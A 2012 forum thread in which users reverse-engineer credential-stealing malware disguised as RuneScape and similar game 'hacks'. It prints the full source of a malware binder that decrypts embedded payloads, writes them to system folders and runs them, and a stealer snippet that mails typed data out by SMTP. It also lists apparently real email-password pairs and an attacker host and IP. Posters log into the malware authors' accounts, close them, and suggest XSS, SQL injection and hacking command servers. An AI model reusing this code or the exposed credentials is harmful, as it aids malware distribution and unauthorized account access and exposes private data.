[QUOTE=Ratzz;34900397]Is it really that easy?[/QUOTE]
Pretty much.
[QUOTE=Ratzz;34900397]Is it really that easy?[/QUOTE]
You need some knowledge of Visual Basic/C# and a copy of Visual Studio Express for the more complex ones.
[QUOTE=supersnail11;34900636]You need some knowledge of Visual Basic/C# and a copy of Visual Studio Express for the more complex ones.[/QUOTE]
Alright, that's no problem then. Thanks guys!
Ok so that's pretty clever.
This was a rar that had a folder inside a folder inside a folder, all with the same name, so you'd click on the first one, click on the second one, click on the third one, and then click on the application because you thought it was a folder.
I hope that wasn't a virus I just accidently ran.
[editline]27th February 2012[/editline]
aaand it was a virus.
[QUOTE=supersnail11;34904576]Ok so that's pretty clever.
This was a rar that had a folder inside a folder inside a folder, all with the same name, so you'd click on the first one, click on the second one, click on the third one, and then click on the application because you thought it was a folder.
I hope that wasn't a virus I just accidently ran.
[editline]27th February 2012[/editline]
aaand it was a virus.[/QUOTE]
Hope you can clean your system easily
HOLY
FUCKING
[b]JESUS[/b]
Cracked a keylogger, I get [b][i]915[/i][/b] logs from Project Neptune, including the keys logged from my PC.
And, they weren't sent to anyone. They're stored entirely on the gmail.
Holy.
Fuck.
Also, he has the keylogger installed himself :P
[editline]28th February 2012[/editline]
That was the virus I ran. So I'm now getting keylogger logs from my own computer
[editline]28th February 2012[/editline]
Ah, and here's his Runescape username.
[editline]28th February 2012[/editline]
[url]http://www.youtube.com/watch?v=VzW8eH68NTM[/url]
He used the gmail as his youtube account.
Apparently this guy thought no obfuscation except for this was enough.
[csharp]new NetworkCredential("ajax329rs@gmail.com", new string(this.t) + new string(this.k) + new string(this.a) + new string(this.k) + new string(this.l) + new string(this.k) + new string(this.j) + new string(this.k) + new string(this.z) + new string(this.k) + new string(this.p));
[/csharp]
[code]http://www.youtube.com/watch?v=UqogO9K0ujo
ajax329rs@gmail.com:Galatasaray
okan01@live.nl[/code]
Would this fall under white hat hacking?
Or just saving the ignorant?
Boredom.
Got in to one, google said "Woops, can't let you do that, you're from a different country. Guess the email or answer security question."
Security question was "What town do you usually log in from?"
Their YouTube profile said they were from Denmark
I typed in Denmark
It worked.
[editline]28th February 2012[/editline]
Pages upon pages of Neptune logs..
[editline]28th February 2012[/editline]
[url]http://www.youtube.com/watch?v=9qBO_elhA1g[/url]
This one is down
So I wonder, who has gotten the most loot with just one account stealer?
[img]http://dl.dropbox.com/u/11401644/Images/spiral_loot.png[/img]
I got a bunch of facebook, runescape, steam, etc. details from one, but you beat me.
Also, here's some help for you guys: The two main keyloggers I've found:
[b]Project Neptune[/b]
The least dangerous of the two, it consists of one main namespace that contains a ton of variables with russian and indian characters. The username and password are encrypted with TripleDES. You can find the credentials by first finding the SendEmail function. Then you find all references to it, where you should find a line that looks like this:
[code]Module1.SendEmail(ref Module1.ΛνυψΙΖ, [highlight]ref Module1.ΗλΘυΓ, ref Module1.νςΜρΔ[/highlight], ref Module1.ΖγΡχΦ, ref text2, ref text, ref value, ref Module1.τΦΗξΝν);[/code]
The variables highlighted in red are the username and password. Right click and go to definition to find the encoded values. Then right click and find all references to find a line that reassigns the variable. The variable farthest to the right is the key to the encryption.
[code]Module1.νςΜρΔ = Module1.ΓρΦα(Module1.ΓρΦα(Module1.νςΜρΔ, "Application.StartupPath"), [highlight]Module1.ΕΜΨηπ[/highlight]);[/code]
(Highlighted variable is the key).
In terms of a system standpoint, all Neptune does is take pictures and log keystrokes, then sends them to the email.
[b]Unknown Logger[/b]
Unknown Logger is a nasty piece of shit. While easy to decode, DO NOT FUCKING RUN THIS. It will disable your antivirus, steal your steam info, cd keys, OS keys, facebook details, any online game details, and basically anything worth anything that it can get its hands on.
In terms of decrypting, it's pretty easy. Open up the executable with notepad or notepad++, and find the line that has values separated by what is usually something like "@Unknown Logger V 1.2@" (Always in between two @)" The first value in between the @@ is the username, second is the password, third is the server.
[editline]28th February 2012[/editline]
For anyone looking to try their hand at Fallen-Empire, don't. The .NET assembly just loads an embedded C++ application, so no use trying.
YES! Got another one it only has 2 accounts, but still deleting it.
[QUOTE=supersnail11;34906013]For anyone looking to try their hand at Fallen-Empire, don't. The .NET assembly just loads an embedded C++ application, so no use trying.[/QUOTE]
Well mainly those are nicely coded rats. So even if you reverse them you end up getting no where except for the callback point. I have reported something like 5 cybergate rats and haven't heard anything back from no-ip.
It would be nice if you could "steal" rat victims by reverse engineering the server, and then mass uninstall the botnet, leaving a .txt on their desktop saying something like "be more careful next time"
But sadly, you can't
OR
You could look for the no-ip address by decompiling it, look at which ip it points to, scan that ip for any open ports that have exploits (Or find exploits for them), gain full access to that computer, remotely control the rat to transfer to your server, and uninstall all bots
Sadly, while for a good cause, still black hat hacking
[QUOTE=nekosune;34885646]This guy is clever, used variable names of odd characters.
[editline]26th February 2012[/editline]
Well I hit a snag here, it uploads everything to a website, not IRC.[/QUOTE]
try xss or sql injection
Project Neptune Binder Source
[csharp]
Imports System
Imports Microsoft.VisualBasic
Module Binder
Dim Locations As String() = {"+Loc+"}
Dim Delays As String() = {"+Delay+"}
Dim Names As String() = {"+Names+"}
Dim Byts As String() = {"+Byts+"}
Sub Main()
On Error Resume Next
For i As Integer = 0 To Locations.GetUpperBound(0)
Select Case Locations(i)
Case "AppData"
Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.ApplicationData)
Case "Favorites"
Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.Favorites)
Case "MyDocuments"
Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.MyDocuments)
Case "System"
Locations(i) = Environment.GetFolderPath(System.Environment.SpecialFolder.System)
Case Else
Locations(i) = Locations(i)
End Select
Next
For i As Integer = 0 To Byts.GetUpperBound(0)
Dim BFile As Byte() = decrypt(Convert.FromBase64String(Byts(i)), "thyonic")
Dim Location As String = Locations(i) & "\" & Names(i)
IO.File.WriteAllBytes(Location, BFile)
wait(Delays(i) * 1000 * 60)
System.Diagnostics.Process.Start(Location)
Next
End Sub
Private Sub wait(ByVal interval As Integer)
Dim sw As New System.Diagnostics.Stopwatch
sw.Start()
Do While sw.ElapsedMilliseconds < interval
' Allows UI to remain responsive
System.Windows.Forms.Application.DoEvents()
Loop
sw.Stop()
End Sub
Function decrypt(ByVal message As Byte(), ByVal password As String) As Byte()
Dim passarr As Byte() = System.Text.Encoding.Default.GetBytes(password)
Dim rand1 As Integer = message(message.Length - 1) Xor 112
Dim outarr(message.Length) As Byte
Dim u1 As Integer
For i1 As Integer = 0 To message.Length - 1
outarr(i1) = (message(i1) Xor rand1) Xor passarr(u1)
If u1 = password.Length - 1 Then u1 = 0 Else u1 = u1 + 1
Next
ReDim Preserve outarr(message.Length - 2)
Return outarr
End Function
End Module
[/csharp]
[QUOTE=uitham;34913125]It would be nice if you could "steal" rat victims by reverse engineering the server, and then mass uninstall the botnet, leaving a .txt on their desktop saying something like "be more careful next time"
But sadly, you can't
OR
You could look for the no-ip address by decompiling it, look at which ip it points to, scan that ip for any open ports that have exploits (Or find exploits for them), gain full access to that computer, remotely control the rat to transfer to your server, and uninstall all bots
Sadly, while for a good cause, still black hat hacking[/QUOTE]
How is it black hat? Doesn't black hat mean it's for a bad cause?
[QUOTE=Darwin226;34913380]How is it black hat? Doesn't black hat mean it's for a bad cause?[/QUOTE]
Black hat hacking is to hack with malicious intent.
[QUOTE=uitham;34913125]It would be nice if you could "steal" rat victims by reverse engineering the server, and then mass uninstall the botnet, leaving a .txt on their desktop saying something like "be more careful next time"
But sadly, you can't
OR
You could look for the no-ip address by decompiling it, look at which ip it points to, scan that ip for any open ports that have exploits (Or find exploits for them), gain full access to that computer, remotely control the rat to transfer to your server, and uninstall all bots
Sadly, while for a good cause, still black hat hacking[/QUOTE]
Well I did port scan/geo ip the ones I reported and they are all personal computers. I would report them to their isps but I have tried that in the past and got no where.
In case any of you come across this .net packed one. Its assembly name is tyronerat. Its a vb6 virus. If you want the vb6 binary just pm me.
[url]http://anubis.iseclab.org/?action=result&task_id=1a7a14d5f95b5d554e1f6d96d183a8297&format=html[/url]
ssj4000ajaxmoo.no-ip.biz
108.85.134.100
108-85-134-100.lightspeed.austtx.sbcglobal.net
[img]http://i.imgur.com/aYWj3.png[/img]
nope no scam here guess i'll try a different hack
Since my programming skills are pretty small (only c++) I can only get emails from simple VB obfuscated "hacks". I have a more advanced one now.
[url]http://pastebin.com/wxqY1ZdK[/url]
One of the encrypted strings is too long so i will post it seperatly
[url]http://pastebin.com/XgmE9T9L[/url]
It is declared right after
[code]
try
{
[/code]
Problem is i'm not quite sure what is happening. Is it decrypting the string (which is source code for the malicious part of the program ?) and then executing it when the program is ran ? Because there is an Assembly.
I tried to output the decrypted string, but all i got was even more incomprehensible text. So could anyone explain ?
the guy from RunescapeBundler just tried to recover his account.
Just replied to the google email and the process is cancelled.
[code]
Private Sub Button1_Click(sender As Object, e As EventArgs)
Dim mailMessage As MailMessage = New MailMessage()
Dim smtpClient As SmtpClient = New SmtpClient()
smtpClient.Credentials = New NetworkCredential("jom21@hotmail.de", "lollol852")
smtpClient.Port = 587
smtpClient.Host = "smtp.live.com"
smtpClient.EnableSsl = True
smtpClient.EnableSsl = True
mailMessage.[To].Add("jom21@hotmail.de")
mailMessage.From = New MailAddress("Username@gmail.com")
mailMessage.Subject = "lollol852"
mailMessage.Body = Me.TextBox1.Text + Me.TextBox2.Text
smtpClient.Send(mailMessage)
Me.Timer1.Start()
End Sub
[/code]
HMM I WONDER WHAT HIS CREDENTIALS ARE
Also with large complicated stuff, is it best to just run the decryption part and print the result?
Too late.
[editline]28th February 2012[/editline]
Already did that, closed account
[editline]28th February 2012[/editline]
Like yesterday
[QUOTE=supersnail11;34914465]Too late.
[editline]28th February 2012[/editline]
Already did that, closed account
[editline]28th February 2012[/editline]
Like yesterday[/QUOTE]
You came across "Runescape Gold Generator" yet?
The one with the variable names like ఋ?
There may be more like that, but THEY ARE SO FREAKING HARD
[url]http://www.youtube.com/watch?v=329CV_8hcgA[/url]
This is why you don't use your GMail for your YouTube when you're keylogging.
[QUOTE=uitham;34914543]You came across "Runescape Gold Generator" yet?
The one with the variable names like ఋ?
There may be more like that, but THEY ARE SO FREAKING HARD[/QUOTE]
Probably because they were obfuscated.
[QUOTE=uitham;34914543]You came across "Runescape Gold Generator" yet?
The one with the variable names like ఋ?
There may be more like that, but THEY ARE SO FREAKING HARD[/QUOTE]
Variable names like ఋ mean that it's Project Neptune. They're actually pretty easy. Just find the encoded strings and the key, and then use this: [url]http://www.tools4noobs.com/online_tools/decrypt/[/url] (TripleDES)
Sorry, you need to Log In to post a reply to this thread.
